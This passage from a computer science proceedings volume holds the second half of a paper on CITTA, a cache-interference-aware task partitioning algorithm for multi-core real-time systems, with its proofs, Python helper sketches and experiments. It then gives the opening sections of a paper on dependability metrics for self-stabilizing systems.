If the sum of the execution demand and the blocking time is smaller than $D_k$, the task $\tau_k$ will not miss its deadline. We will prove this in Section 4.3. A more formal version of the task partitioning algorithm CITTA is given by Pseudocode 1. The input to procedure CITTA is the taskset $\tau$ to be partitioned and the execution platform $\pi$ consisting of $m$ cores. CITTA repeatedly invokes the procedure TaskPartition, illustrated by Pseudocode 2, to perform step 1 of the CITTA algorithm. The input to TaskPartition is the temporarily non-allocable taskset $\tau^{tna}$, $\pi$, and the existing task assignment $\tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m))$.

### Pseudocode 1: CITTA($\tau$, $\pi$)

1: sort $\tau$ in non-decreasing order by a selected criterion
2: $\tau^{tna} \leftarrow \tau$, taskAssigned $\leftarrow$ true, $\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m) \leftarrow \emptyset$
3: $\tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m))$
4: while $\tau^{tna} \neq \emptyset$ and taskAssigned $==$ true do
5: $\tau^{tna}$, taskAssigned, $\tau(\pi)$ = TaskPartition($\tau^{tna}$, $\pi$, $\tau(\pi)$)
6: end while
7: if $\tau^{tna} == \emptyset$ then
8: return Success
9: else
10: return Fail
11: end if

Lines 5–7 of the procedure TaskPartition perform step (2) of step 1 of CITTA, i.e. the computation of the upper bound on cache interference for tasks. When CITTA attempts to assign $\tau_i$ to $\pi_x$, the upper bound on cache interference exhibited by each $\tau_k \in \tau(\pi_x)$ is recomputed.

### 4.2 Calculating the Upper Bound on Cache Interference

#### 4.2.1 IP Formulation

We construct an integer programming (IP) formulation to calculate the upper bound on cache interference exhibited by a task $\tau_k$. The interference is bounded over the execution window (EW) of $\tau_k$, an interval of length $C_k'$ that covers $\tau_k$'s execution. Let $N_{i,k}$ denote the number of jobs of an interfering task $\tau_i$ that can run concurrently with $\tau_k$ within the EW; the objective function maximizes the total interference these jobs can impose on $\tau_k$:

$$\text{maximize} \sum_{\tau_i \notin \tau(\pi_x)} N_{i,k} \times I^c_{i,k}. \quad (1.7)$$

We next derive constraints on $N_{i,k}$.
As $N_{i,k}$ counts jobs, it is a non-negative integer:

\[ \forall \tau_i \notin \tau(\pi_x), \quad N_{i,k} \geq 0. \quad (1.8) \]

Taking the smallest execution time of $\tau_i$, $C_i^{\min}$, as 0, we have the following constraint:

\[ \forall \tau_i \notin \tau(\pi_x), \quad N_{i,k} \leq \left\lceil \frac{\max(0, C_k' - T_i)}{T_i} \right\rceil + \xi_i, \quad (1.9) \]

where $\xi_i$ is 1 if $C_k' \bmod T_i - D_i > 0$ and 0 otherwise. The term $\xi_i$ indicates whether or not the last job of $\tau_i$ released within the EW interferes with $\tau_k$. The maximum value of $N_{i,k}$ is taken when the first interfering job of $\tau_i$ finishes just after the start of the EW and the last interfering job of $\tau_i$ starts to execute at the time it is released. Thus, we have the second constraint on $N_{i,k}$:

\[ \forall \tau_i \notin \tau(\pi_x), \quad N_{i,k} \leq 1 + \left\lceil \frac{\max(0, C_k' - T_i + D_i)}{T_i} \right\rceil. \quad (1.10) \]

If $N_{i,k} \geq 2$, the first and the last interfering jobs of $\tau_i$ may each occupy almost 0 computation capacity within the EW. Let $J'_i$ be a job among the remaining $N_{i,k} - 2$ interfering jobs of $\tau_i$ between the first and the last ones. Both the release time $r'_i$ and the deadline $d'_i$ of $J'_i$ are within the EW of $\tau_k$. If $\tau_i$ is (or will be) successfully assigned to core $\pi_y$, at least $C_i$ computation capacity of that core is reserved for the execution of $J'_i$ during $[r'_i, d'_i]$. The total execution of interfering tasks on each core $\pi_y$ (with $y \neq x$) cannot exceed $C_k'$. Since we do not know the core assignment of the tasks in $\tau^{na}$, those tasks are allowed to execute on any core. Thus, we have the following inequality:

\[ \forall y \neq x, \quad \sum_{\tau_i \in (\tau(\pi_y) \cup \tau^{na})} \max(0, N_{i,k} - 2) \times C_i \leq C_k'. \quad (1.11) \]

The objective function (1.7), together with the constraints on $N_{i,k}$, i.e. Inequalities (1.8), (1.9), (1.10) and (1.11), forms our IP problem.
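For tiny instances the IP can be solved by brute-force enumeration; the following sketch assumes an objective that maximizes the total interference $\sum_i N_{i,k} \cdot I^c_{i,k}$, and takes the per-task job-count bounds (from the constraints above) as precomputed inputs:

```python
from itertools import product

def solve_ip_bruteforce(Ic_job, n_max, cap, groups, C):
    """Brute-force the IP for small instances: maximize sum(N[i] * Ic_job[i])
    subject to 0 <= N[i] <= n_max[i] and, for every core y != x,
    sum over i in groups[y] of max(0, N[i] - 2) * C[i] <= cap  (cf. (1.11)).

    Ic_job[i]: interference of one job of tau_i on tau_k (assumed given);
    n_max[i]:  per-task bound on N_{i,k} from the job-count constraints;
    groups:    task-index lists, one per core y != x (not-yet-assigned tasks
               may appear in every group); C[i]: WCETs; cap: the EW length C'_k.
    """
    best = 0
    for N in product(*(range(b + 1) for b in n_max)):
        if all(sum(max(0, N[i] - 2) * C[i] for i in g) <= cap for g in groups):
            best = max(best, sum(N[i] * Ic_job[i] for i in range(len(N))))
    return best
```

This enumeration is exponential in the number of interfering tasks; the paper instead solves the (linearized) problem with an ILP solver.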
As task parameters such as \( C_i, D_i, T_i \) are known, the inputs of the IP formulation are the length of the EW, \( C_k' \), the existing task assignment \( \tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m)) \), and the remaining tasks that still need to be assigned, \( \tau^{na} \). Thus, we use \( IP(C_k', \tau(\pi), \tau^{na}) \) to denote the IP problem and \( I^C(C_k', \tau(\pi), \tau^{na}) \) to denote its optimal solution. When CITTA attempts to assign a task \( \tau_i \) to a core \( \pi_x \), the upper bound on cache interference exhibited by each \( \tau_k \in \tau(\pi_x) \), i.e. the tasks that are already assigned to \( \pi_x \), is recomputed. We now show that a tighter upper bound for task \( \tau_k \) is obtained by this re-computation. Given a task \( \tau_k \) and an execution window of length \( C_k' \), suppose the IP formulation in the previous computation of cache interference is \( IP(C_k', \tau(\pi), \tau^{na}) \), and the IP formulation for the re-computation is \( IP(C_k', \tau'(\pi), \tau'^{na}) \). Between the two computations for the same task \( \tau_k \), CITTA may assign some tasks to cores. If a task \( \tau_i \) is assigned to a core \( \pi_x \), \( \tau_i \) is removed from \( \tau^{na} \) and added to \( \tau(\pi_x) \). Obviously, we have \( \tau'^{na} \subseteq \tau^{na} \) and \( \forall 1 \leq x \leq m, \tau(\pi_x) \subseteq \tau'(\pi_x) \).

**Lemma 1.** Given \( \tau_k \) and \( C_k' \),

\[ I^C(C_k', \tau'(\pi), \tau'^{na}) \leq I^C(C_k', \tau(\pi), \tau^{na}). \]

**Proof Sketch:** Due to space considerations, we only show a proof sketch. From condition (1.6), one can prove the following: if \( \tau_i \in \tau(\pi_x) \) for some core \( \pi_x \), then \( C_i + I^c_i \leq D_i \). By this statement and the constraints of the IP problem, one can show that any solution of \( IP(C_k', \tau'(\pi), \tau'^{na}) \) is also feasible for \( IP(C_k', \tau(\pi), \tau^{na}) \).
Thus,

\[ I^C(C_k', \tau'(\pi), \tau'^{na}) \leq I^C(C_k', \tau(\pi), \tau^{na}). \]

Lemma 1 is the reason why CITTA forces the recalculation of the upper bound on cache interference for tasks that are already assigned to cores.

#### 4.2.2 Iterative Computation

Due to the presence of cache interference, a job may execute longer than \( C_k \) on a multi-core platform with shared caches. However, a larger execution time may in turn introduce more cache interference. We give a sufficient condition under which a value can be used as an upper bound on the cache interference exhibited by \( \tau_k \), denoted by \( I^c_k \).

**Lemma 2.** Given \( \tau(\pi) \) and \( \tau^{na} \), if \( \exists C_k' \geq C_k \) such that \( C_k' = C_k + I^C(C_k', \tau(\pi), \tau^{na}) \), then \( I^c_k = I^C(C_k', \tau(\pi), \tau^{na}) \).

The equation can be solved by means of fixed-point iteration: the iteration starts with the initial EW length \( C_k' = C_k \) and interference bound \( I^C(C_k', \tau(\pi), \tau^{na}) = 0 \). By solving the IP, we compute a new upper bound on the cache interference \( I^C(C_k', \tau(\pi), \tau^{na}) \) and the corresponding new EW length \( C_k' = C_k + I^C(C_k', \tau(\pi), \tau^{na}) \). The iterative computation for \( \tau_k \) stops either when no update of \( I^C(C_k', \tau(\pi), \tau^{na}) \) occurs anymore, or when the computed \( I^C(C_k', \tau(\pi), \tau^{na}) \) is large enough to make \( \tau_k \) unschedulable, i.e. \( I^C(C_k', \tau(\pi), \tau^{na}) + C_k' > D_k \).

**Computational complexity:** The original IP can easily be transformed into an Integer Linear Programming (ILP) problem by introducing a new integer variable \( y_{i,k} \) for each \( N_{i,k} \) with two additional constraints: \( y_{i,k} \geq 0 \) and \( y_{i,k} \geq N_{i,k} - 2 \). Inequality (1.11) can then be replaced by \( \forall y \neq x, \sum_{\tau_i \in (\tau(\pi_y) \cup \tau^{na})} y_{i,k} \times C_i \leq C_k' \).
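The fixed-point iteration of Lemma 2 is straightforward to sketch, abstracting the IP solver behind a callable (a hypothetical interface, not the paper's):

```python
def fixed_point_interference(Ck, Dk, solve_ip):
    """Fixed-point iteration of Lemma 2: find C' >= C_k with C' = C_k + I^c(C').

    solve_ip(window) is assumed to return the IP optimum for an execution
    window of the given length, and to be non-decreasing in its argument.
    Returns the interference bound I^c_k, or None if tau_k cannot be
    guaranteed schedulable (the bound grows past the deadline).
    """
    Cw = Ck                    # initial EW length C'_k = C_k (I^c = 0)
    while True:
        I = solve_ip(Cw)
        if Cw + I > Dk:        # bound large enough to make tau_k unschedulable
            return None
        if Ck + I == Cw:       # no update anymore: fixed point reached
            return I
        Cw = Ck + I            # new EW length, recompute the IP
```

With integer parameters the loop terminates, since the window length strictly grows until a fixed point or the deadline test fails.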
In the transformed ILP problem, we have in total \( 2n \) variables and \( 4n + m - 1 \) constraints, where \( n \) is the number of tasks in the taskset. The complexity of the IP is the same as the complexity of solving the transformed ILP problem, which is \( O(4n^2 + m) \) [11]. For \( \tau_k \), let \( I^c_{k,\min} \) be the smallest difference between the cache interference caused by one job of \( \tau_i \) and one job of \( \tau_j \), i.e. \( I^c_{k,\min} = \min_{i \neq j} |I^c_{i,k} - I^c_{j,k}| \). The iterative algorithm takes at most \( \gamma = \max_k \frac{D_k - C_k}{I^c_{k,\min}} \) iterations to terminate, since in each iteration \( C_k' \) either stays the same (a fixed point) or increases by at least \( I^c_{k,\min} \), and the iteration stops once \( C_k' \) exceeds \( D_k \). Thus, the complexity of computing the upper bound on the cache interference exhibited by one task is \( O(\gamma(4n^2 + m)) \). In TaskPartition, at most \( n \) tasks are checked on at most \( m \) cores; thus, the complexity of TaskPartition is \( O(\gamma(4n^2 + m)nm) \). Since the while loop in CITTA executes at most \( n \) times, the complexity of CITTA is \( O(\gamma(4n^2 + m)n^2m) \).

### 4.3 Schedulability Analysis

#### 4.3.1 Uniprocessor Feasibility

Task partitioning reduces the problem of multi-core processor scheduling to a set of single-core scheduling problems (one for each core). Following Theorem 1, we first propose a schedulability condition, stated in Theorem 2, for uniprocessor scheduling, taking shared cache interference into consideration. Note that the condition in Theorem 2 is sufficient but not necessary: since \( I^c_j \) is a calculated upper bound on the shared cache interference exhibited by \( \tau_j \), the actual cache interference can be smaller than \( I^c_j \).
**Theorem 2.** A taskset \( \tau(\pi_x) \) is schedulable under EDF\(_{np}\) on a uniprocessor platform if

\[ \forall t, \quad \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t) \leq t \quad (2.1) \]

and for all \( \tau_j \in \tau(\pi_x) \):

\[ \forall t : C_j + I^c_j \leq t \leq D_j : \quad C_j + I^c_j + \sum_{\tau_i \in \tau(\pi_x), i \neq j} DBF^c(\tau_i, t) \leq t. \quad (2.2) \]

#### 4.3.2 Schedulability Analysis of CITTA

We first derive a property that must be satisfied by tasks assigned to the same core by CITTA. It is useful for the feasibility analysis conducted later for CITTA.

**Lemma 3.** If tasks are assigned to cores by CITTA,

\[ \forall \pi_x \in \pi, \quad \sum_{\tau_i \in \tau(\pi_x)} U_i^c \leq 1. \quad (2.3) \]

**Proof:** Let \( \tau_u \) be the task with the largest relative deadline among the tasks in \( \tau(\pi_x) \), i.e. \( D_u = \max\{D_i \mid \tau_i \in \tau(\pi_x)\} \). Obviously,

\[ \tau_i \in \tau(\pi_x) \Rightarrow D_i \leq D_u. \]

Since \( \tau_u \) satisfies condition (1.6), we have

\[ D_u \geq \sum_{\tau_i \in \tau(\pi_x)} DBF^{c*}(\tau_i, D_u). \quad (2.4) \]

From Equation (1.4) and since \( T_i \geq D_i \), \( DBF^{c*}(\tau_i, D_u) \) satisfies:

\[ DBF^{c*}(\tau_i, D_u) = U_i^c \times (D_u - D_i + T_i) \geq U_i^c \times D_u. \]

Replacing \( DBF^{c*}(\tau_i, D_u) \) in Inequality (2.4),

\[ D_u \geq \sum_{\tau_i \in \tau(\pi_x)} U_i^c \times D_u \Rightarrow \sum_{\tau_i \in \tau(\pi_x)} U_i^c \leq 1. \]

This is Inequality (2.3). \( \square \)

On each core \( \pi_x \in \pi \), the tasks in \( \tau(\pi_x) \) are scheduled under \( \text{EDF}_{np} \). The next lemma shows the feasibility of \( \tau(\pi_x) \).

**Lemma 4.** If the tasks are assigned to cores by CITTA, then \( \forall \pi_x \in \pi \), \( \tau(\pi_x) \) is feasible on core \( \pi_x \) under \( \text{EDF}_{np} \).

**Proof:** For the sake of contradiction, assume that each task in \( \tau(\pi_x) \) satisfies condition (1.6), but that a task's deadline is missed when scheduling the tasks in \( \tau(\pi_x) \) on core \( \pi_x \).
Let \( t_f \) be the time at which a task misses a deadline on core \( \pi_x \). By Theorem 2, either

\[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) > t_f, \quad (2.5) \]

or there exist \( \tau_p \in \tau(\pi_x) \) and \( t_f \) with \( C_p + I^c_p \leq t_f \leq D_p \) such that

\[ C_p + I^c_p + \sum_{\tau_i \in \tau(\pi_x), i \neq p} DBF^c(\tau_i, t_f) > t_f. \quad (2.6) \]

It will be shown that if either Inequality (2.5) or (2.6) holds, a contradiction is reached. We first prove the existence of a \( \tau_i \in \tau(\pi_x) \) that satisfies \( D_i \leq t_f \). Assume \( \forall \tau_i \in \tau(\pi_x), D_i > t_f \); then, by the definition of \( DBF^c \),

\[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) = 0. \]

Under this assumption, neither Inequality (2.5) nor (2.6) can hold. So the assumption is false, and we can always find a \( \tau_i \in \tau(\pi_x) \) with \( D_i \leq t_f \). Let \( \tau_s \) be such a task with the largest relative deadline, i.e. \( D_s = \max\{D_i \mid \tau_i \in \tau(\pi_x) \land D_i \leq t_f\} \).

(A) We first prove that Inequality (2.5) leads to a contradiction. From Inequalities (1.5) and (2.5),

\[ \sum_{\tau_i \in \tau(\pi_x)} DBF^{c*}(\tau_i, t_f) > t_f. \quad (2.7) \]

By the definition of \( DBF^{c*}(\tau_i, t_f) \) and of \( D_s \), the terms with \( D_i > t_f \) vanish, so

\[ \sum_{\tau_i \in \tau(\pi_x)} DBF^{c*}(\tau_i, t_f) = \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} \left( C_i + I^c_i + U_i^c \times (t_f - D_i) \right) \]
\[ = \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} \left( C_i + I^c_i + U_i^c \times (D_s - D_i) + U_i^c \times (t_f - D_s) \right) \]
\[ = \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} \left( DBF^{c*}(\tau_i, D_s) + U_i^c \times (t_f - D_s) \right). \quad (2.8) \]

\( \tau_s \) satisfies condition (1.6):

\[ D_s \geq \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} DBF^{c*}(\tau_i, D_s).
\]

From Equation (2.8) and Inequality (2.7), we have

\[ D_s + \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} U_i^c \times (t_f - D_s) > t_f, \quad (2.9) \]

which, since \( t_f \geq D_s \), implies \( \sum_{\tau_i \in \tau(\pi_x)} U_i^c > 1 \). This contradicts Lemma 3.

(B) We now prove that Inequality (2.6) also leads to a contradiction. By the definitions of \( \tau_s \) and \( \tau_p \), we know \( D_s \leq t_f \leq D_p \). We consider two cases, (B1): \( D_s = D_p \) and (B2): \( D_s < D_p \).

(B1) If \( D_s = D_p \), then \( t_f = D_p \) and

\[ DBF^{c*}(\tau_p, t_f) = C_p + I^c_p. \]

From Inequality (2.6),

\[ \sum_{\tau_i \in \tau(\pi_x)} DBF^{c*}(\tau_i, t_f) > t_f. \]

This leads to a contradiction as proved in case (A).

(B2) If \( D_s < D_p \), we have

\[ C_p + I^c_p \leq \max_{\tau_j \in \tau(\pi_x), D_j > D_s} (C_j + I^c_j) \]

and

\[ \sum_{\tau_i \in \tau(\pi_x), i \neq p} DBF^c(\tau_i, t_f) \leq \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} DBF^{c*}(\tau_i, t_f). \]

From Inequality (2.6), we thus have

\[ \max_{\tau_j \in \tau(\pi_x), D_j > D_s} (C_j + I^c_j) + \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} DBF^{c*}(\tau_i, t_f) > t_f. \]

Replacing \( \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} DBF^{c*}(\tau_i, t_f) \) in the above inequality using Equation (2.8), we have

\[ \max_{\tau_j \in \tau(\pi_x), D_j > D_s} (C_j + I^c_j) + \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} \left( DBF^{c*}(\tau_i, D_s) + U_i^c \times (t_f - D_s) \right) > t_f. \quad (2.10) \]

Since \( \tau_s \) satisfies condition (1.6),

\[ D_s \geq \sum_{\tau_i \in \tau(\pi_x), D_i \leq D_s} DBF^{c*}(\tau_i, D_s) + \max_{\tau_j \in \tau(\pi_x), D_j > D_s} (C_j + I^c_j). \quad (2.11) \]

From Inequalities (2.10) and (2.11),

\[ \sum_{\tau_i \in \tau(\pi_x)} U_i^c > 1. \]

This also contradicts Lemma 3. \( \square \)

The correctness of algorithm CITTA follows by application of Lemma 4:

**Theorem 3.** If the task partitioning algorithm CITTA returns Success on taskset \( \tau \), then the resulting partitioning is schedulable by \( \text{EDF}_{np} \) on each core.
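The per-core test of Theorem 2 that underlies this analysis can also be checked directly in code; a sketch assuming integer parameters, given interference bounds, and a caller-supplied horizon:

```python
def core_schedulable(tasks, Ic, t_max):
    """Check the sufficient test of Theorem 2 on one core for t = 1..t_max.

    tasks: list of (C, D, T) tuples; Ic: interference bounds I^c_i (given).
    t_max is assumed to cover every point where the demand could first
    exceed t (choosing a safe horizon is left to the caller).
    """
    def dbf_c(i, t):  # DBF^c: Equation (0.1) with C_i inflated by I^c_i
        C, D, T = tasks[i]
        return max(0, ((t - D) // T + 1) * (C + Ic[i]))

    for t in range(1, t_max + 1):
        # Condition (2.1): total demand never exceeds the interval length.
        if sum(dbf_c(i, t) for i in range(len(tasks))) > t:
            return False
        # Condition (2.2): account for blocking by a later-deadline job.
        for j, (C, D, _) in enumerate(tasks):
            if C + Ic[j] <= t <= D:
                rest = sum(dbf_c(i, t) for i in range(len(tasks)) if i != j)
                if C + Ic[j] + rest > t:
                    return False
    return True
```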
## 5 Experiments

We assess the performance of CITTA and the proposed schedulability test in terms of acceptance ratio, that is, the number of tasksets that are deemed schedulable divided by the number of tasksets tested. CITTA is compared against Global EDF (GEDF) as proposed in [32], which is, to the best of our knowledge, the only other work on real-time multiprocessor scheduling that takes shared cache interference into account. As mentioned at the beginning of Section 4.1, the CITTA algorithm first sorts tasks in non-decreasing order using some criterion and then assigns tasks to the processor cores according to condition (1.6). We consider the following five sorting criteria: the reciprocal of a task's WCET \(\frac{1}{C_i}\), a task's period \(T_i\), the reciprocal of a task's utilization \(\frac{1}{U_i} = \frac{T_i}{C_i}\), a task's slack \(S_i = T_i - C_i\), and random order.

### 5.1 Workload Generation

We systematically generated synthetic workloads by varying i) the number of tasks \(n\) (\(n = 10, 20\)) in the taskset, ii) the total task utilization \(U_{tot}\) (\(U_{tot}\) from 0.1 to \(m - 0.1\) in steps of 0.2), iii) the cache interference factor \(IF\) (\(IF = 0.2\) or \(0.8\)), and iv) the probability of two tasks having cache interference with each other, \(P\) (\(P = 0.1\) or \(0.4\)). Given those four parameters, we generated 20000 tasksets in each experiment. We adopted the same policy as described in [31] to generate task parameters such as task period and utilization, and the cache interference between two tasks. In each experiment, we measure the number of tasksets that can be successfully partitioned by CITTA with the different sorting criteria and the number of tasksets that can be scheduled by GEDF. The acceptance ratio is the number of schedulable tasksets divided by the total number of tasksets.

### 5.2 Results

We report the major trends characterizing the experimental results, illustrated in Figures 2 and 3.
In the figures, CITTA-<criterion> denotes the variant of CITTA that uses <criterion> for sorting tasks, and GLB stands for the GEDF scheduler. CITTA outperforms global EDF. Our results clearly show that CITTA outperforms global EDF in all the test cases. It is also evident that CITTA is highly effective for multi-core real-time systems in which cache interference must be accounted for. As shown in Figure 2(a), when \(IF = 0.2, P = 0.1\), all the generated tasksets can be successfully partitioned by all variants of CITTA if \(U_{tot} < 2.5\), while global EDF achieves the full acceptance ratio only when \(U_{tot} < 1.5\). CITTA is able to partition tasksets with the highest tested total utilization, i.e., \(U_{tot} = 3.9\), whereas global EDF can only schedule tasksets with a total utilization of up to \(U_{tot} = 2.5\). It is important to observe that the acceptance-ratio gap between all variants of CITTA and global scheduling is large when \(U_{tot} \in [2, 3.5]\). Such a schedulability performance gap also exists for different degrees of cache interference and different numbers of tasks in the taskset, as shown in Figure 2(b), Figure 3(a) and Figure 3(b). We have also compared the schedulability performance of CITTA and GEDF using heterogeneous task periods, i.e., \(T_i \in [100, 300]\) or \(T_i \in [100, 500]\) (the results are omitted due to space limitations). In those tests, CITTA still outperforms GEDF. The performance gap among different variants of CITTA is small. As depicted in Figures 2(a) and 3(a), when the cache interference is small \((IF = 0.2, P = 0.1)\), CITTA-T and CITTA-random performed worse than CITTA-1/C, CITTA-S and CITTA-1/U when \(U_{tot} > 3\), while as the degree of cache interference increases, this schedulability performance gap becomes smaller, as shown in Figure 2(b) and Figure 3(b). 
One reason could be that, even though tasks are sorted by different criteria, all variants of CITTA force recalculation of the upper bound on cache interference to obtain an upper bound that is as small as possible. The cache interference obtained by all variants of CITTA is thus likely to be similar. Therefore, if cache interference dominates the schedulability result, the gap in schedulability performance among different variants of CITTA is small. Cache interference degrades schedulability performance. Figure 2(a) and Figure 2(b) compare the acceptance ratio for different \( P \) and \( IF \) for tasksets consisting of 10 tasks. For the same \( U_{\text{tot}} \), the acceptance ratio achieved by all variants of CITTA and by global EDF decreases as \( P \) and \( IF \) increase. This is because larger \( P \) and \( IF \) mean that more tasks in the taskset have larger cache interference with each other, which can potentially increase the upper bound on cache interference, eventually making the interfered tasks unschedulable. Similar observations can be made from Figure 3(a) and Figure 3(b) for tasksets consisting of 20 tasks. 5.3 Average Execution Time We measured the execution time of CITTA for different taskset sizes. The executions were conducted on an Intel Xeon processor using a single core running at 2.4 GHz. On average, it takes 0.85 seconds to run CITTA to assign a taskset consisting of 10 tasks to a processor with 4 cores, and 2.3 seconds for tasksets with 20 tasks. 6 Conclusions Shared caches in multi-core processors introduce serious difficulties in providing guarantees on the real-time properties of embedded software. In this paper, we addressed the problem of task partitioning in the presence of cache interference. To this end, we proposed CITTA, a cache-interference-aware task partitioning algorithm. 
An integer programming formulation was constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conducted a schedulability analysis of CITTA and formally proved its correctness. A set of experiments was performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluation shows that CITTA outperforms global EDF scheduling in terms of tasksets deemed schedulable. As for future work, we plan to combine the task partitioning and cache partitioning approaches to design a new real-time scheduling algorithm that can achieve even better schedulability. References
Dependability Engineering of Silent Self-Stabilizing Systems Abhishek Dhama\textsuperscript{1}, Oliver Theel\textsuperscript{1}, Pepijn Crouzen\textsuperscript{2}, Holger Hermanns\textsuperscript{2}, Ralf Wimmer\textsuperscript{3}, and Bernd Becker\textsuperscript{3} \textsuperscript{1}System Software and Distributed Systems, University of Oldenburg, Germany \{abhishek.dhama, theel\}@informatik.uni-oldenburg.de \textsuperscript{2}Dependable Systems and Software, Saarland University, Germany \{crouzen, hermanns\}@cs.uni-saarland.de \textsuperscript{3}Chair of Computer Architecture, Albert-Ludwigs-University Freiburg, Germany \{wimmer, becker\}@informatik.uni-freiburg.de Abstract. Self-stabilization is an elegant way of realizing non-masking fault-tolerant systems. Sustained research over the last decades has produced multiple self-stabilizing algorithms for many problems in distributed computing. In this paper, we present a framework to evaluate multiple self-stabilizing solutions under a fault model that allows intermittent transient faults. To that end, metrics to quantify the dependability of self-stabilizing systems are defined. It is also shown how to derive models that are suitable for probabilistic model checking in order to determine those dependability metrics. A heuristics-based method is presented to analyze counterexamples returned by a probabilistic model checker in case the system under investigation does not exhibit the desired degree of dependability. Based on this analysis, the self-stabilizing algorithm is subsequently refined. 1 Introduction Self-stabilization has proven to be a valuable design concept for dependable systems. It allows the effective realization of non-masking fault-tolerant solutions to a problem in a particularly hostile environment: an environment subject to arbitrarily many transient faults potentially corrupting the self-stabilizing system’s run-time state of registers and variables. 
Consequently, designing a self-stabilizing system is not an easy task, since many scenarios due to faults must correctly be handled beyond the fact that the system has to solve a given problem when being undisturbed by faults. The formal verification of a self-stabilizing solution to a given problem is therefore often quite complicated. It consists of 1) a convergence proof showing that the system eventually returns to a set of system states (called \textit{safe} or \textit{legal states}) where it solves the given problem and 2) a closure proof showing that once within the set of legal states, it does not leave this set voluntarily in the absence of faults occurring. Whereas the closure proof is often not too complicated, the convergence proof may become extremely challenging. It requires some finiteness argument showing the return of the system to the legal state set in a finite number of computational steps in the absence of newly manifested faults.\footnote{This work was supported by the German Research Foundation (DFG) under grant SFB/TR 14/2 “AVACS,” www.avacs.org.} As discussed, finding a self-stabilizing solution to a given problem as well as proving its self-stabilization property are generally not easy and present areas of agile research. But what if multiple self-stabilizing solutions to a problem are already known? Which solution should be preferred and therefore be chosen? Clearly, many criteria do exist, and their relevance depends on the concrete application scenario. In this paper, we focus on dependability properties of those systems. For example: “Does the given self-stabilizing system exhibit a system availability of at least $p$?”, with system availability being only one example of a dependability metric. Other metrics are, e.g., reliability, mean time to failure, and mean time to repair. 
Based on the evaluation of relevant dependability metrics, a decision should be taken as to which solution out of the set of available solutions should be chosen and put to work for one's purposes. Building on [1], we present useful dependability metrics for differentiating among self-stabilizing solutions and show how to evaluate them. For this purpose, we propose modeling a self-stabilizing algorithm together with the assumed fault model in terms of a discrete-time Markov decision process or a discrete-time Markov chain. Whereas the former modeling allows – with the help of a probabilistic model checker – reasoning about the behavior of the system under any fair scheduler, the latter modeling is suitable if concrete information about the scheduler used in the system setting is available. The self-stabilizing solution exhibiting the best dependability metric value can then easily be identified and used. Furthermore, we show a possible way out of the situation where all available self-stabilizing solutions to a given problem have turned out to fail in the sense described above: if the dependability property under investigation cannot be verified for a particular system, then an automatically generated counterexample (being a set of traces for which, as a whole, the property does not hold) is prompted. By analyzing the counterexample, the self-stabilizing algorithm is then refined and again model-checked. This refinement loop is repeated until the dependability property is finally established or a maximal number of refinement loops has been executed. In the scope of this paper, w.r.t. the abstraction scheme and system refinement, we restrict ourselves to silent self-stabilizing algorithms and a dependability metric being a notion of limiting (system) availability called unconditional limiting availability, in a system environment where faults “continuously keep on occurring.” Silent self-stabilizing algorithms do not switch among legal states in the absence of faults. 
Unconditional limiting availability is a generalization of limiting availability in the sense that any initial state of the system is allowed. Finally, with the more general fault model, we believe that we can analyze self-stabilizing systems in a more realistic setting: contrary to other approaches, we do not analyze the system only after the last fault has already occurred but always allow faults to tamper with the system state. The paper is structured as follows: in Section 2, we give an overview of related work. Then, in Section 3, we introduce useful dependability metrics for self-stabilizing systems. Additionally, we state the model used for dependability metrics evaluation, based on discrete-time Markov decision processes or discrete-time Markov chains. Section 4 describes the refinement loop and thus dependability engineering based on probabilistic model checking, counterexample generation, counterexample analysis, and silent self-stabilizing system refinement, along with an abstraction scheme to overcome scalability problems. Section 5, finally, concludes the paper and sketches our future research. 2 Related Work The body of literature is replete with efforts towards the engineering of fault-tolerant systems to increase dependability. In [2], a formal method to design a – in a certain sense – multitolerant system is presented. The method employs detectors and correctors to add fault tolerance with respect to a set of fault classes. A detector checks whether a state predicate is satisfied during execution. A corrector ensures that – in the event of a state predicate violation – the program will again satisfy the predicate. It is further shown in [3] that the detector-corrector approach can be used to obtain masking fault-tolerant from non-masking fault-tolerant systems. But, despite its elegance, the fault model used in their applications admits only transient faults. Ghosh et al. 
described in [4] an approach to engineer a self-stabilizing system in order to limit the effect of a fault. A transformer is provided to modify a non-reactive self-stabilizing system such that the system stabilizes in constant time if a single process is faulty. However, there is a trade-off involved in using the transformer, as discussed in [5]. The addition of such a transformer to limit the recovery time from a single faulty process might lead to an increase in stabilization time. A compositional method, called “cross-over composition,” is described in [6] to ensure that an algorithm self-stabilizing under a specific scheduler converges under an arbitrary scheduler. This is achieved by composing the target “weaker” algorithm with a so-called “strong algorithm” such that actions of the target algorithm are synchronized with the strong algorithm. The resulting algorithm is self-stabilizing under any scheduler under which the strong algorithm is proven to be self-stabilizing. However, the properties of the strong algorithm determine the class of schedulers admissible by the composed algorithm. Recent advances in counterexample generation for stochastic model checking have generated considerable interest in using the information given by the counterexamples for debugging or optimizing systems. An interactive visualization tool to support the debugging process is presented in [7]. The tool renders violating traces graphically along with state information and probability mass. It also allows the user to selectively focus on a particular segment of the violating traces. However, it does not provide any heuristics or support to modify the system in order to achieve the desired dependability property. Thus, the user must modify systems by hand without any tool support. In addition to these shortcomings, only models based on Markov chains are handled by the tool. In particular, models containing non-determinism cannot be visualized. 
